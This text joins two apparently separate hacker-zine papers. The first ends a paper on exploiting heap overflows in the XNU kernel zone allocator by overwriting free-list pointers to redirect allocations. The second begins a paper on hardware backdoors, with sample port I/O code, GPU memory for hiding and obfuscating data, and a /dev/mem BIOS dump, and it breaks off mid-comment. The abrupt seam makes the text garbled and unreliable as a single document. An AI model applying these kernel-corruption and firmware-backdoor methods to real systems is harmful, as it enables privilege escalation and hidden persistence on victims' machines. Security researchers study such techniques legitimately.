z->max_size = max;
z->elem_size = size;
z->alloc_size = alloc;
z->zone_name = name;
z->count = 0;
z->doing_alloc = FALSE;
z->doing_gc = FALSE;
z->exhaustible = FALSE;
z->collectable = TRUE;
z->allows_foreign = FALSE;
z->expandable = TRUE;
z->waiting = FALSE;
z->async_pending = FALSE;


As you can see, the free_elements linked list is
initialized to 0. Before returning, zinit() uses the
zalloc_async() function to allocate and free a single
element in the zone. The zinit() function returns a
zone_t pointer which is used for each allocation of new
objects with zalloc().


Now that the zone is set up, the zalloc() and zfree()
functions are used to allocate and free elements from
the zone. Also zget() is used to perform a non-blocking
allocation from the zone.


Firstly I will look at the zalloc() function. zalloc() 
is basically a wrapper function around the 
zalloc_canblock() function. 


The first thing zalloc_canblock() does is attempt to 
remove an element from the zone’s free_elements list 
and use it. The following macro (REMOVE_FROM_ZONE) is 
responsible for doing this. 


#define REMOVE_FROM_ZONE(zone, ret, type)                           \
MACRO_BEGIN                                                         \
        (ret) = (type) (zone)->free_elements;                       \
        if ((ret) != (type) 0) {                                    \
            if (!is_kernel_data_addr(((vm_offset_t *)(ret))[0])) {  \
                panic("A freed zone element has been modified.\n"); \
            }                                                       \
            (zone)->count++;                                        \
            (zone)->free_elements = *((vm_offset_t *)(ret));        \
        }                                                           \
MACRO_END
#else /* MACH_ASSERT */


As you can see, this macro simply returns the
free_elements pointer from the zone struct. It
also increments the count attribute and sets the
free_elements attribute of the zone struct to
the "next" free element. It does this by
dereferencing the current free_elements address.
This shows that the first 4 bytes of an unused
allocation in a zone is used as a pointer to the
next free element. This will come in handy to us
later.


The check is_kernel_data_addr() is used to make
sure we haven’t tampered with the list. The
definition of this check is shown below:


#define is_kernel_data_addr(a) \
  (!(a) || ((a) >= vm_min_kernel_address && !((a) & 0x3)))


const vm_offset_t vm_min_kernel_address = VM_MIN_KERNEL_ADDRESS;
#define VM_MIN_KERNEL_ADDRESS ((vm_offset_t) 0x00001000)


As you can see this simply checks that the address is
either 0 (the end of the list) or is greater than or equal
to 0x1000 (which isn’t a problem at all) and word aligned.
This check does not really cause any trouble when exploiting
an overflow as you’ll see later.
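

To make the predicate concrete, here is a user-space copy of
it. The sketch_ names are made up and the 32-bit address type
is an assumption matching the 0x1000 constant above; the logic
is the same expression as the macro.

```c
#include <stdint.h>

#define SKETCH_VM_MIN_KERNEL_ADDRESS 0x00001000u

/* User-space copy of the predicate; `a` is the stored "next" pointer. */
static int sketch_is_kernel_data_addr(uint32_t a)
{
    return !a || (a >= SKETCH_VM_MIN_KERNEL_ADDRESS && !(a & 0x3));
}
```

Note that a value such as 0x41414141 is rejected because it is
not word aligned, while 0x41414140 is accepted, so where this
check is compiled in the stored pointer has to be a multiple
of four.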


If there are no free elements in the list the 
doing_alloc attribute of the zone is checked. 


This attribute is used as a lock. If a blocking 
allocation is performed the allocator will sleep until 
this is unset. 


Once it is ok to allocate an element the
kernel_memory_allocate() function is used to
allocate one. The allocation is of a fixed
size for the zone. The kernel_memory_allocate()
function is used at the base level of pretty
much all the memory allocators present in the
XNU kernel. It basically just uses
vm_page_alloc() to allocate pages. Once the
zone allocator successfully calls this function
zcram() is used to break the pages up into elements
and add them to the free_elements list. Each element
is added in the same way zfree() does, so now that
I have looked at the allocation process I will
show the workings of zfree().

The zfree() function is used to add an element back
to the zone free_elements list. The first thing zfree()
does is to make sure that an element is not being zfree()’ed
which was never zalloc()’ed. This is done using the
from_zone_map() macro. This macro is defined as follows.


#define from_zone_map(addr, size) \
        ((vm_offset_t)(addr) >= zone_map_min_address && \
        ((vm_offset_t)(addr) + size -1) < zone_map_max_address)


In the case of an overflow however, this check is not
particularly important so I will move on.


Next the zfree() function (if zone debugging is enabled) will
run through and check that the element did not come from
a different zone to the one which has been passed to zfree().
If this is the case a kernel panic() is thrown, alerting
on what the problem was.


Next zfree() runs through all the free_elements in the zones
list and calls the pmap_kernel_va() function. The code which
does this is as follows.


for (this = zone->free_elements;
     this != 0;
     this = * (vm_offset_t *) this)
        if (!pmap_kernel_va(this) || this == elem)
                panic("zfree");


The pmap_kernel_va() check is shown below.


#define VM_MIN_KERNEL_ADDRESS   ((vm_offset_t) 0x00001000)
#define pmap_kernel_va(VA)      \
        (((VA) >= VM_MIN_KERNEL_ADDRESS) && ((VA) <= vm_last_addr))


The pmap_kernel_va check simply checks that the address
is greater than or equal to the VM_MIN_KERNEL_ADDRESS.
This address is defined (above) as 0x1000, the start of
the first page of valid kernel memory (straight after
PAGEZERO). It then checks if the address is less than
or equal to the vm_last_addr. This is defined as
VM_MAX_KERNEL_ADDRESS (shown below).


vm_last_addr = VM_MAX_KERNEL_ADDRESS; /* Set the highest address */
#define VM_MAX_KERNEL_ADDRESS ((vm_offset_t) 0xFE7FFFFF)
#define VM_MAX_KERNEL_ADDRESS ((vm_offset_t) 0xDFFFFFFF)


Basically this means that anywhere within almost the entire
address space of the kernel is valid.


Once these checks are performed, the final step zfree() does
is to use the ADD_TO_ZONE() macro in order to add the free’ed
element back to the free_elements list in the zone struct.


Here is the macro used to do this:


#define ADD_TO_ZONE(zone, element)                               \
MACRO_BEGIN                                                      \
        if (zfree_clear)                                         \
        {   unsigned int i;                                      \
            for (i=1;                                            \
                 i < zone->elem_size/sizeof(vm_offset_t) - 1;    \
                 i++)                                            \
            ((vm_offset_t *)(element))[i] = 0xdeadbeef;          \
        }                                                        \
        ((vm_offset_t *)(element))[0] = (zone)->free_elements;   \
        (zone)->free_elements = (vm_offset_t) (element);         \
        (zone)->count--;                                         \
MACRO_END


If zfree_clear is set, this macro runs through the memory
allocated for the element which is being free()’ed in 4 byte
intervals. It writes out 0xdeadbeef to each location, filling
the memory and clearing any original data. It then writes into
the first 4 bytes of the allocation, the old free_elements
pointer, from the zone struct.


Now that I have shown briefly how the zone allocator
functions I will look at what happens in the case of an
overflow.


In the diagram below you can see an element in use
followed by a free element. The first element
contains the data used by the struct (in this
sample case the struct is made up.) The second
element consists of the pointer to the next
free element followed by the unsigned long
0xdeadbeef repeated to fill the struct. Both the
in use and free elements are the same size.


    low memory (0x00000000)

    [ Element in use ]
    [ 00 00 00 01 ]
    [ 22 22 22 22 ]
    [ 33 33 33 33 ]
    [ 00 00 00 00 ]
    [ 00 00 00 00 ]
    [ 00 00 00 00 ]
    [ 00 00 00 00 ]

    [ Free Element ]
    [ ?? ?? ?? 7d ]  <== Pointer to next free element.
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]

    high memory (0xffffffff)


In the case where a buffer within the first
in use struct is overflowed (in this case with
capital A [0x41]), it is then possible to overwrite
the free elements "next" pointer. This is
demonstrated below.


    low memory (0x00000000)

    [ Element being overflowed ]
    [ 00 00 00 01 ]
    [ 22 22 22 22 ]
    [ 33 33 33 33 ]
    [ 41 41 41 41 ]  <== Overflow starts here
    [ 41 41 41 41 ]
    [ 41 41 41 41 ]
    [ 41 41 41 41 ]

    [ Free Element ]
    [ 41 41 41 41 ]  <== Overflow into pointer.
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]
    [ ef be ad de ]

    high memory (0xffffffff)


In this case, when the REMOVE_FROM_ZONE() macro 
is used by zalloc() the user controlled address 
0x41414141 will become the zone struct’s new 
free_elements pointer, and consequently, be 
used by the next allocation of the element type. 


If this address is positioned correctly it may be 
possible to have something user controlled overwrite 
a useful pointer in kernel space and in this way gain 
control of execution. 
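

The free list behaviour described in this section can be
modelled in user space. The sketch below is a simulation only:
the sim_* names are invented, "addresses" are word indexes into
an array rather than kernel pointers, index 0 plays the role of
the NULL list terminator, and the sanity checks are left out.

```c
#include <stdint.h>
#include <string.h>

#define SIM_WORDS 64                /* size of the simulated zone memory */

struct sim_zone {
    uint32_t mem[SIM_WORDS];        /* backing store, indexed by word */
    uint32_t free_elements;         /* index of first free element, 0 = none */
    uint32_t elem_words;            /* element size in 32-bit words */
    int      count;                 /* elements currently in use */
};

/* Modelled on ADD_TO_ZONE: poison the element, then push it on the list. */
static void sim_zfree(struct sim_zone *z, uint32_t elem)
{
    for (uint32_t i = 1; i < z->elem_words; i++)
        z->mem[elem + i] = 0xdeadbeef;
    z->mem[elem] = z->free_elements;    /* first word = old list head */
    z->free_elements = elem;
    z->count--;
}

/* Modelled on REMOVE_FROM_ZONE (without the check): pop the list head. */
static uint32_t sim_zalloc(struct sim_zone *z)
{
    uint32_t ret = z->free_elements;
    if (ret != 0) {
        z->count++;
        z->free_elements = z->mem[ret]; /* first word becomes the new head */
    }
    return ret;
}
```

If the first word of the element at the head of the list is
changed between sim_zfree() and sim_zalloc(), the value written
there becomes free_elements after the next allocation, which is
the effect shown in the second diagram.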


Due to the checks performed on zfree() it is
recommended that efforts should be taken to avoid
this element being passed to zfree(), as this will
result in a kernel panic().


--[ 11 - Conclusion


Hopefully if you bothered to read this far you learned 
something useful. If not, I apologize. 


If you take any of these ideas and work on them further 
or know of a better method to do anything covered in this 
paper I’d appreciate an email letting me know at: 
nemo@felinemenace.org. Flames to mercy@felinemenace.org 
please ;) 


Now for the thanks. A huge thank you to my amazing fiancee pif
for her love and support while I was writing this.
Thanks to bk for all the help and long conversations about XNU.
Thanks to everyone at felinemenace for all the support, code
and fun times. Also a big thank you to my computer for not
kernel panic()’ing for a third time during the process of
saving this paper. I think if you had written random bytes
over the paper a third time I wouldn’t have had the stamina
to rewrite (again).


Finally, this paper isn’t complete without another bad Star 
Wars pun to match the title so here we go.... 


May the fork()’s be with root...


1. Abstract


Today, we’re observing a growing number of papers focusing on hardware
hacking. Even if hardware-based backdoors are far from being a good
solution to use in the wild, this topic is very important as some big
corporations are planning to take control of our computers without our
consent using some really badly designed concepts such as DRM and TCPA.

As we can’t let them do this at any cost, the time has come for a little
introduction to the hardware world...


This paper constitutes a tiny introduction to hardware hacking from the
backdoor writer’s perspective (hey, this is phrack, I’m not going to explain
how to pilot your coffee machine with an RS232 interface). The thing is,
even if backdooring hardware isn’t such a good idea, it is a good way to
get started in hardware hacking. The aim of the author is to give readers
the basics of hardware hacking, which should be useful to prepare for the
fight against TCPA and other crappy things sponsored by big sucke... erm...
"companies" such as Sony and Microsoft.


This paper is i386 centric. It does not cover any other architecture,
but it can be used as a basis for research on other hardware. Thus,
bear in mind that most of the material presented here won’t work on any
machine other than a PC. Subjects such as devices, the BIOS and the
internal workings of a PC will be discussed, and some ideas about turning
all these things to our own advantage will be presented.


This paper IS NOT an ad nor a presentation of some 3v1L s0fTw4r3,
so you won’t find a fully functional backdoor here. The aim of the author
is to provide information that will help you write your own stuff,
not to provide you with already finished work. This subject isn’t a
particularly difficult one, all it takes is imagination.


In order to understand this article, some knowledge of x86 assembly
and architecture is strongly recommended. If you’re a newbie to these
subjects, I strongly recommend that you read "The Art of Assembly
Programming" (see [1]).


2. A quick introduction to the I/O system


Before digging straight into the subject, some explanations must be
given. Those of you who already know how I/O works on Intel processors and
what it is there for might just prefer to skip to the next section. Others,
just keep on reading.


As this paper focuses on hardware, it would be practical to know how
to access it. The I/O system provides such access. As everybody knows,
the processor (CPU) is the heart, or, more accurately, the brain of the
computer. But the only thing it does is compute. Basically, a CPU isn’t
of much help without devices. Devices give the CPU data to compute, and
allow it to bring back an answer to our requests. The I/O system is used
to link most devices to the CPU. The way processors see I/O based devices
is much the same as the way they see memory. In fact, all processors do to
communicate with devices is read and write data "somewhere in memory" :
the I/O system is in charge of handling the next steps. This "somewhere in
memory" is represented by an I/O port. I/O ports are special "addresses"
that connect the CPU data bus to the device. Each I/O based device uses at
least one I/O port, many of them using several. Basically, the only thing
device drivers do is manipulate I/O ports (well, very basically, that’s
what they do, just to communicate with hardware). The Intel Architecture
provides three main ways to manipulate I/O ports : memory-mapped I/O,
Input/Output mapped I/O and DMA.


memory-mapped I/O 


The memory-mapped I/O system allows us to manipulate I/O ports as if they
were basic memory. Instructions such as ’mov’ are used to interface with
it. This system is simple : all it does is map I/O ports to memory
addresses so that when data is written/read at one of these addresses, the
data is actually sent to/received by the device connected to the
corresponding port. Thus, the way to communicate with a device is the same
as communicating with memory.


Input/Output mapped I/O


The Input/Output mapped I/O system uses dedicated CPU instructions to
access I/O ports. On i386, these instructions are ’in’ and ’out’ :


out reg, 254 ; writes content of reg register to port #254


in 254, reg ; reads data from port #254 and stores it in reg


The only problem with these two instructions is that the port is
encoded on 8 bits, allowing access only to ports 0 to 255. The sad thing is
that this range of ports is often connected to internal hardware such as
the system clock. The way to circumvent it is the following (taken from
"The Art of Assembly Programming", see [1]) :


To access I/O ports at addresses beyond 255 you must load the 16-bit I/O
address into the DX register and use DX as a pointer to the specified I/O
address. For example, to write a byte to the I/O address $378 you would use
an instruction sequence like the following:


mov $378, dx 
out al, dx 


DMA 


DMA stands for Direct Memory Access. The DMA system is used to enhance
device-to-memory performance. Back in the old days, most hardware made
use of the CPU to transfer data to and from memory. When computers started
to become "multimedia" (a term as meaningless as "people ready" but really
good looking in "we-are-trying-to-fuck-you-deep-in-the-ass ads"), that is
when computers started to come equipped with CD-ROM drives and sound cards,
the CPU couldn’t handle tasks such as playing music while displaying a
shotgun firing at a monster because the user has just hit the ’CTRL’ key.
So, manufacturers created a new chip to be able to carry out such things,
and so was born the DMA controller. DMA allows devices to transfer data
from and to memory with very few operations done by the CPU. Basically, all
the CPU does is initiate the DMA transfer, and then the DMA chip takes care
of the rest, allowing the CPU to focus on other tasks. The very interesting
thing is that since the CPU doesn’t actually do the transfer and since
devices are being used, protected mode does not interfere, which means we
can write and read (almost) anywhere we would like to. This idea is far
from being new, and PHC already mentioned it in one of their phrack
parodies.


DMA is a really powerful system. It allows us to do very cool
tricks, but this comes at a great price : DMA is a pain in
the ass to use as it is very hardware specific. Here are the two main
kinds of DMA systems :


- DMA Controller (third-party DMA) : this DMA system is really old
and inefficient. The idea here is to have a general DMA Controller on the
motherboard that will handle every DMA operation for every device. This
controller was mainly used with ISA devices and its use is now deprecated
because of performance issues and because only 4 to 8 DMA transfers
(depending on whether the board had two cascaded DMA Controllers) could be
set up at the same time (a DMA Controller only provides 4 channels).


- DMA Bus mastering (first-party DMA) : this DMA system provides
far better performance than the DMA Controller. The idea is to allow
each device to manage DMA itself through a process known as "Bus Mastering".
Instead of relying on the general DMA Controller, each device is able to
take control of the system bus to perform its transfers, allowing hardware
manufacturers to provide an efficient system for their devices.


These three things are practical enough to get started, but modern
operating systems provide means to access I/O too. As there are a lot of
these systems on the computer market, I’ll introduce only the GNU/Linux
system, which constitutes a perfect system to discover hardware hacking on
Intel. Like many systems, Linux runs in two modes : user land and kernel
land. Since kernel land already allows good control over the system, let’s
see the user land ways to access I/O. I’ll explain here two basic ways to
play with hardware : in*()/out*() and /dev/port.


in/out 


The in and out instructions can be used on Linux in user land. Likewise,
the functions outb(2), outw(2), outl(2), inb(2), inw(2), inl(2) are
provided to play with I/O and can be called from kernel land or user land.


As stated in "Linux Device Drivers" (see [2]), their use is the following :


unsigned inb(unsigned port);
void outb(unsigned char byte, unsigned port);


Read or write byte ports (eight bits wide). The port argument is defined as
unsigned long for some platforms and unsigned short for others. The return
type of inb is also different across architectures.


unsigned inw(unsigned port);
void outw(unsigned short word, unsigned port);


These functions access 16-bit ports (word wide); they are not available
when compiling for the M68k and S390 platforms, which support only byte
I/O.


unsigned inl(unsigned port);
void outl(unsigned longword, unsigned port);


These functions access 32-bit ports. longword is either declared as
unsigned long or unsigned int, according to the platform. Like word I/O,
"long" I/O is not available on M68k and S390.


Note that no 64-bit port I/O operations are defined. Even on 64-bit
architectures, the port address space uses a 32-bit (maximum) data path.


The only restriction on accessing I/O ports this way from user land is
that you must first call the iopl(2) or ioperm(2) functions, which are
sometimes protected by security systems like grsec. And of course, you must
be root. Here is a sample code using this way to access I/O :


------[ io.c

/*
** Just a simple code to see how to play with inb()/outb() functions.
**
** usage is :
**           * read  : io r <port address>
**           * write : io w <port address> <value>
**
** compile with : gcc io.c -o io
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/io.h>   /* iopl(2) inb(2) outb(2) */

void read_io(long port)
{
  unsigned int val;

  val = inb(port);
  fprintf(stdout, "value : %X\n", val);
}

void write_io(long port, long value)
{
  outb(value, port);
}

int main(int argc, char **argv)
{
  long port;

  if (argc < 3)
    {
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
      exit(1);
    }
  port = atoi(argv[2]);
  /* raise the I/O privilege level so that every port is accessible */
  if (iopl(3) == -1)
    {
      fprintf(stderr, "could not get permissions to I/O system\n");
      exit(1);
    }
  if (!strcmp(argv[1], "r"))
    read_io(port);
  else if (!strcmp(argv[1], "w") && argc > 3)  /* a write needs a value */
    write_io(port, atoi(argv[3]));
  else
    {
      fprintf(stderr, "usage is : io <r|w> <port> [value]\n");
      exit(1);
    }
  return 0;
}


/dev/port


/dev/port is a special file that allows you to access I/O as if you 
were manipulating a simple file. The use of the functions open(2), read(2), 
write(2), lseek(2) and close(2) allows manipulation of /dev/port. Just go 
to the address corresponding to the port with lseek() and read() or write() 
to the hardware. Here is a sample code to do it :


------[ port.c

/*
** Just a simple code to see how to play with /dev/port
**
** usage is :
**           * read  : port r <port address>
**           * write : port w <port address> <value>
**
** compile with : gcc port.c -o port
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>      /* lseek(2) read(2) write(2) close(2) */
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

void read_port(int fd, long port)
{
  unsigned char val = 0;

  lseek(fd, port, SEEK_SET);     /* the file offset is the port number */
  read(fd, &val, sizeof(char));
  fprintf(stdout, "value : %X\n", val);
}

void write_port(int fd, long port, long value)
{
  unsigned char val = (unsigned char)value;   /* one byte per port */

  lseek(fd, port, SEEK_SET);
  write(fd, &val, sizeof(char));
}

int main(int argc, char **argv)
{
  int fd;
  long port;

  if (argc < 3)
    {
      fprintf(stderr, "usage is : port <r|w> <port> [value]\n");
      exit(1);
    }
  port = atoi(argv[2]);
  if ((fd = open("/dev/port", O_RDWR)) == -1)
    {
      fprintf(stderr, "could not open /dev/port\n");
      exit(1);
    }
  if (!strcmp(argv[1], "r"))
    read_port(fd, port);
  else if (!strcmp(argv[1], "w") && argc > 3)  /* a write needs a value */
    write_port(fd, port, atoi(argv[3]));
  else
    {
      fprintf(stderr, "usage is : port <r|w> <port> [value]\n");
      exit(1);
    }
  close(fd);
  return 0;
}


Ok, one last thing before closing this introduction : for Linux users 
who want to list the I/O Ports on their system, just do a 
"cat /proc/ioports", ie: 


$ cat /proc/ioports # lists ports from 0000 to FFFF
0000-001f : dma1
0020-0021 : pic1
0040-0043 : timer0
0050-0053 : timer1
0060-006f : keyboard
0080-008f : dma page reg
00a0-00a1 : pic2
00c0-00df : dma2
00f0-00ff : fpu
0170-0177 : ide1
01f0-01f7 : ide0
0213-0213 : ISAPnP
02f8-02ff : serial
0376-0376 : ide1
0378-037a : parport0
0388-0389 : OPL2/3 (left)
038a-038b : OPL2/3 (right)
03c0-03df : vga+
03f6-03f6 : ide0
03f8-03ff : serial
0534-0537 : CS4231
0a79-0a79 : isapnp write
0cf8-0cff : PCI conf1
b800-b8ff : 0000:00:0d.0
  b800-b8ff : 8139too
d000-d0ff : 0000:00:09.0
  d000-d0ff : 8139too
d400-d41f : 0000:00:04.2
  d400-d41f : uhci_hcd
d800-d80f : 0000:00:04.1
  d800-d807 : ide0
  d808-d80f : ide1
e400-e43f : 0000:00:04.3
  e400-e43f : motherboard
    e400-e403 : PM1a_EVT_BLK
    e404-e405 : PM1a_CNT_BLK
    e408-e40b : PM_TMR
    e40c-e40f : GPE0_BLK
    e410-e415 : ACPI CPU throttle
e800-e81f : 0000:00:04.3
  e800-e80f : motherboard
    e800-e80f : pnp 00:02


3. Playing with GPU 


3D cards are just GREAT, period. When you’re installing such a card in
your computer, you’re not just plugging in a device that can render nice
graphics, you’re also putting a mini-computer in your own computer. Today’s
graphics cards aren’t a simple chip anymore. They have memory, they have a
processor, they even have a BIOS ! You can enjoy a LOT of features from
these little things.


First of all, let’s consider what a 3D card really is. 3D cards are
here to enhance your computer’s performance when rendering 3D and to send
output for your screen to display. As I said, there are three parts that
interest us in our 3v1L doings :


1/ The Video RAM. It is memory embedded on the card. This memory is
used to store the scene to be rendered and to store computed results. Most
of today’s cards come with more than 256 MB of memory, which provides us
with a nice place to store our stuff.


2/ The Graphical Processing Unit (GPU for short). It constitutes the
processor of your 3D card. Most 3D operations are maths, so most of the
GPU instructions perform maths designed for graphics.


3/ The BIOS. A lot of devices today include their own BIOS. 3D cards
are no exception, and their little BIOS can be very interesting as it
contains the firmware of your 3D card, and when you access a firmware, well,
you can do nearly anything you dream of.


I’ll give ideas about what we can do with these three elements, but
first we need to know how to play with the card. Sadly, as with any
device in your computer, you need the specs of your hardware, and most 3D
cards are not open enough to do whatever we want. But this is not a big
problem in itself as we can use a simple API which will talk to the card
for us. Of course, this prevents us from using tricks on the card in
certain conditions, like in a shellcode, but once you’ve gained root and
can do what pleases you on the system it isn’t an issue anymore. The API I’m
talking about is OpenGL (see [3]), and if you’re not already familiar with
it, I suggest you read the tutorials on [4]. OpenGL is a 3D programming
API defined by the OpenGL Architecture Review Board, which is composed of
members from many of the industry’s leading graphics vendors. This library
often comes with your drivers and by using it, you can easily develop
portable code that will use the features of the 3D card present.


As we now know how to communicate with the card, let’s take a deeper
look at this piece of hardware. GPUs are used to transform a 3D environment
(the "scene") given by the programmer into a 2D image (your screen).
Basically, a GPU is a computing pipeline applying various mathematical
operations to data. I won’t introduce here the complete process of
transforming a 3D scene into a 2D display as it is not the point of this
paper. In our case, all you have to know is :


1/ The GPU is used to transform input (usually a 3D scene but nothing
prevents us from inputting anything else)


2/ These transformations are done using mathematical operations commonly
used in graphical programming (and again nothing prevents us from using
those operations for another purpose)


3/ The pipeline is composed of two main computations, each involving
multiple steps of data transformation :


- Transformation and Lighting : this step translates 3D objects
into 2D nets of polygons (usually triangles), generating a
wireframe rendering.


- Rasterization : this step takes the wireframe rendering as input
data and computes the pixel values to be displayed on the screen.


So now, let’s take a look at what we can do with all these features.
What interests us here is to hide data where it would be hard to find and
to execute instructions outside the computer’s processor. I won’t talk
about patching 3D card firmware, as it requires heavy reverse engineering
and is very specific to each card, which is not the topic of this paper.


First, let’s consider instruction execution. Of course, as we are
playing with a 3D card, we can’t do everything we can do with a computer
processor, like triggering software interrupts, issuing I/O operations or
manipulating memory, but we can do lots of mathematical operations. For
example, we can encrypt and decrypt data with the 3D card’s processor,
which can make the reverse engineering task quite painful. It can also
speed up programs relying on heavy mathematical operations by letting the
computer processor do other things while the 3D card computes for it. Such
things have already been widely done. In fact, some people are already
having fun using GPUs for various purposes (see [5]). The idea here is to
use the GPU to transform the data we feed it with. GPUs provide a system to
program them called "shaders". You can think of shaders as programmable
hooks within the GPU which allow you to add your own routines to the data
transformation process. These hooks can be triggered at two places in the
computing pipeline, depending on the shader you’re using. Traditionally,
shaders are used by programmers to add special effects to the rendering
process, and as the rendering process is composed of two steps, the GPU
provides two programmable shaders. The first shader is called the
"Vertex shader". This shader is used during the transformation and lighting
step. The second shader is called the "Pixel shader" and this one is used
during the rasterization process.


Ok, so now we have two entry points in the GPU system, but this
doesn’t tell us how to develop and inject our own routines. Again, as we
are playing in the hardware world, there are several ways to do it,
depending on the hardware and the system you’re running on. Shaders use
their own programming languages : some are low level assembly-like
languages, some others are high level C-like languages. The three main
languages used today are high level ones :


- High-Level Shader Language (HLSL) : this language is provided by
Microsoft’s DirectX API, so you need MS Windows to use it. (see [6])


- OpenGL Shading Language (GLSL or GLSlang) : this language is
provided by the OpenGL API. (see [7])


- Cg : this language was introduced by NVIDIA to program on their
hardware using either the DirectX API or the OpenGL one. Cg comes
with a full toolkit distributed by NVIDIA for free (see [8] and [9]).


Now that we know how to program GPUs, let’s consider the most
interesting part : data hiding. As I said, 3D cards come with a nice
amount of memory. Of course, this memory is aimed at graphical usage but
nothing prevents us from storing some stuff in it. In fact, with the help
of shaders we can even ask the 3D card to store and encrypt our data. This
is fairly easy to do : we put the data at the beginning of the pipeline, we
program the shaders to decide how to store and encrypt it and we’re done.
Then, retrieving this data is nearly the same operation : we ask the
shaders to decrypt it and to send it back to us. Note that this encryption
is really weak, as we rely only on the shaders’ computing and as the
encryption and decryption process can be reversed by simply looking at the
shader code in your program, but this can constitute an effective way to
improve already existing tricks (a 3D card based Shiva could be fun).


Ok, so now we can start coding stuff taking advantage of our 3D cards.
But wait ! We don’t want to mess with shaders, we don’t want to learn
about 3D programming, we just want to execute code on the device so we can
quickly test what we can do with those devices. Learning shader
programming is important because it allows us to understand the device
better, but it can take a really long time for people unfamiliar with the
3D world. Recently, nVIDIA released an SDK allowing programmers to easily
use 3D devices for purposes other than graphics. nVIDIA CUDA (see [10]) is
an SDK allowing programmers to use the C language with new keywords used to
tell the compiler which part of the code should be executed on the device
and which part of the code should be executed on the CPU. CUDA also comes
with various mathematical libraries.


Here is a funny code to illustrate the use of CUDA :


/*
** 3ddb.cu : a very simple program used to store an array in
** GPU memory and make the GPU "encrypt" it. Compile it using nvcc.
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#include <cuda_runtime.h>

/*** GPU code and data ***/

__global__ void encrypt(char *store, size_t len, int key)
{
  /* do any encryption you want here */
  /* and put the result into 'store' */
  /* (you need to modify CPU code if */
  /* the encrypted text size is      */
  /* different than the clear text   */
  /* one).                           */
}

/*** end of GPU code and data ***/

/*** CPU code and data ***/

/* abort with a message whenever a CUDA runtime call fails */
#define CUDA_SAFE_CALL(call)                                      \
  do {                                                            \
    cudaError_t err = (call);                                     \
    if (err != cudaSuccess)                                       \
      {                                                           \
        fprintf(stderr, "error : %s\n", cudaGetErrorString(err)); \
        exit(1);                                                  \
      }                                                           \
  } while (0)

void usage(char *cmd)
{
  fprintf(stderr, "usage is : %s <string> <key>\n", cmd);
  exit(1);
}

void init_gpu(void)
{
  int count = 0;

  CUDA_SAFE_CALL(cudaGetDeviceCount(&count));
  if (count <= 0)
    {
      fprintf(stderr, "error : could not connect to any 3D card\n");
      exit(1);
    }
  CUDA_SAFE_CALL(cudaSetDevice(0));
}

int main(int argc, char **argv)
{
  int    key;
  size_t i, len;
  char   *store;   /* buffer living in GPU memory */
  char   *res;

  if (argc != 3)
    usage(argv[0]);
  init_gpu();
  len = strlen(argv[1]);
  CUDA_SAFE_CALL(cudaMalloc((void **)&store, len));
  CUDA_SAFE_CALL(cudaMemcpy(store, argv[1], len, cudaMemcpyHostToDevice));
  res = (char *)malloc(len);
  key = atoi(argv[2]);
  encrypt<<<128, 256>>>(store, len, key);
  CUDA_SAFE_CALL(cudaMemcpy(res, store, len, cudaMemcpyDeviceToHost));
  for (i = 0; i < len; i++)
    printf("%c", res[i]);
  CUDA_SAFE_CALL(cudaFree(store));
  free(res);
  return 0;
}


4. Playing with BIOS 


BIOSes are very interesting. In fact, a little work has already been
done in this area and some stuff has already been published. But let’s
recap all these things and take a look at what wonderful tricks we can do
with this little chip. First of all, BIOS means Basic Input/Output System.
This chip is in charge of handling the boot process and low-level
configuration, and of providing a set of functions for boot loaders and
operating systems during their early loading process. In fact, at boot
time, the BIOS takes control of the system first, then it does a couple of
checks, then it sets up an IDT to provide features via interrupts and
finally tries to load the boot loader located on each bootable device,
following its configuration. For example, if you specify in your BIOS setup
to first try to boot from the optical drive and then from your hard drive,
at boot time the BIOS will first try to run an OS from the CD, then from
your hard drive. The BIOS’s code is the VERY FIRST code to be executed on
your system. The interesting thing is that backdooring it virtually gives
us deep control of the system and a practical way to bypass nearly any
security system running on the target, since we execute code even before
this system starts ! But the drawback of this thing is big : as we are
playing with hardware, portability becomes a really big issue.


The first thing you need to know about playing with BIOS is that there
are several ways to do it. Some really good publications (see [11]) have
been made on the subject, but I’ll focus on what we can do when patching
the ROM containing the BIOS.


BIOSes are stored in a chip located on your motherboard. Old BIOSes
were single ROMs without write capability, but then some manufacturers
got the brilliant idea to allow BIOS patching. They introduced the BIOS
flasher, which is a little device we can communicate with using the I/O
system. The flasher can read and write the BIOS for us, which is all we
need to play in this land. Of course, as there are many different BIOSes
in the wild, I won’t introduce any particular chip. Here are some pointers
that will help you :


* [12] /dev/bios is a tool from the OpenBIOS initiative (see [13]).
It is a kernel module for Linux that creates devices to easily manipulate
various BIOSes. It can access several BIOSes, including network card
BIOSes. It is a nice tool to play with and the code is nice, so you’ll see
how to get your hands dirty.


* [14] is a WONDERFUL guide that will explain nearly everything
about Award BIOSes to you. This paper is a must read for anyone interested
in this subject, even if you don’t own an Award BIOS.


* [15] is an interesting website to find information about various
BIOSes.


In order to start easy and fast, we’ll use a virtual machine, which
is very handy to test your concepts before you waste your BIOS. I
recommend using Bochs (see [16]) as it is free and open source, and
mainly because it comes with very well commented source code used to
emulate a BIOS. But first, let’s see how BIOSes really work.


As I said, the BIOS is the first entity which has control over your
system at boot time. The interesting thing is that, in order to start
reverse engineering your BIOS, you don’t even need to use the flasher. At
the start of the boot process, the BIOS’s code is mapped (or "shadowed") in
RAM at a specific location and uses a specific range of memory. All we have
to do to read this code, which is 16-bit assembly, is to read memory. The
BIOS memory area starts at 0xf0000 and ends at 0x100000. An easy way to
dump the code is to simply do a


% dd if=/dev/mem of=BIOS.dump bs=1 count=65536 skip=983040
% objdump -b binary -m i8086 -D BIOS.dump


You should note that as the BIOS contains data, such a dump isn’t accurate
as you will have a shift preventing code from being disassembled correctly.
To address this problem, you should use the entry points table provided
below and use objdump with the ’--start-address’ option.


Of course, the code you see in memory is rarely easy to retrieve in 
the chip, but the fact you got the somewhat "unencrypted text" can help a 
lot. To get started to see what is interesting in this code, let’s have a 
look at a very interesting comment in the Bochs BIOS source code 
(from [17]) 


// ROM BIOS compatability entry points:
//
